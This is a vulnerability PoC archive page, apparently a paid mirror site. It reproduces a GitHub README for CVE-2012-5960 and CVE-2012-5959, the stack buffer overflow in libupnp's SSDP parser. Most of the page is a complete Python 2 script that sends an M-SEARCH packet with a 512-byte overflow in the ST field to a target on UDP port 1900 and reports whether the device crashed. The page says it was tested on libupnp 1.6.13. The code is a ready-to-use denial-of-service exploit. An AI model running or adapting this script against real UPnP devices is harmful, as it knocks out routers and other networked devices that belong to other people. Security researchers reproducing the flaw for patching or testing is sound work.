Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2012-5960 PoC — UPnP Devices ‘unique_service_name’函数基于栈的缓冲区溢出漏洞

Source
https://github.com/finn79426/CVE-2012-5960-PoC
Associated Vulnerability
Title:UPnP Devices ‘unique_service_name’函数基于栈的缓冲区溢出漏洞 (CVE-2012-5960)
Description:Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) before 1.6.18 allows remote attackers to execute arbitrary code via a long UDN (aka upnp:rootdevice) field in a UDP packet.
Description
CVE-2012-5960, CVE-2012-5959 Proof of Concept
Readme
# CVE-2012-5960-PoC
CVE-2012-5960, CVE-2012-5959 Proof of Concept

隨手記錄一下最近玩的東西。

```python=
#!/usr/bin/python2
# -*- coding: utf-8 -*-
# Usage: python2 libupnp_DoS_PoC.py

import socket

TARGET = 'TARGET_IP'

'''
normal_traffic = \
    'M-SEARCH * HTTP/1.1\r\n'                   \
    'HOST:239.255.255.250:1900\r\n'             \
    'MX:3\r\n'                                  \
    'MAN:"ssdp:discover"\r\n'                   \
    'ST:upnp:rootdevice\r\n'                    \
    '\r\n'
'''

dos = \
    'M-SEARCH * HTTP/1.1\r\n'                   \
    'HOST:239.255.255.250:1900\r\n'             \
    'MX:3\r\n'                                  \
    'MAN:"ssdp:discover"\r\n'                   \
    'ST:uuid:schemas:device:{}:anything\r\n'    \
    '\r\n'.format("A"*512)

# Set up UDP socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.settimeout(1)
s.sendto(dos, (TARGET, 1900))

try:
    while True:
        data, addr = s.recvfrom(65507)  # Maximum UDP data length
        print "------------------------\nFailed DoS...\n------------------------\n"
        print "Response:"
        print addr, data
        exit(1)
except socket.timeout:
    print "------------------------\nSuccessful DoS!!!\n------------------------\n"
    exit(0)
```


Tested on libupnp 1.6.13:

![libupnp_1.6.13_CVEmarked](https://imgur.com/IhyUdp8.png)

Demo video:

[![](http://img.youtube.com/vi/3W3NO3nnKJM/0.jpg)](http://www.youtube.com/watch?v=3W3NO3nnKJM "")
File Snapshot

 [4.0K]  /data/pocs/39d473db7751cd111278a91909b89aee07a5c480
├── [1.2K]  libupnp_DoS_PoC.py
├── [1.5K]  README.md
└── [ 35K]  ssdp_server(libupnp_1.6.13).c

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →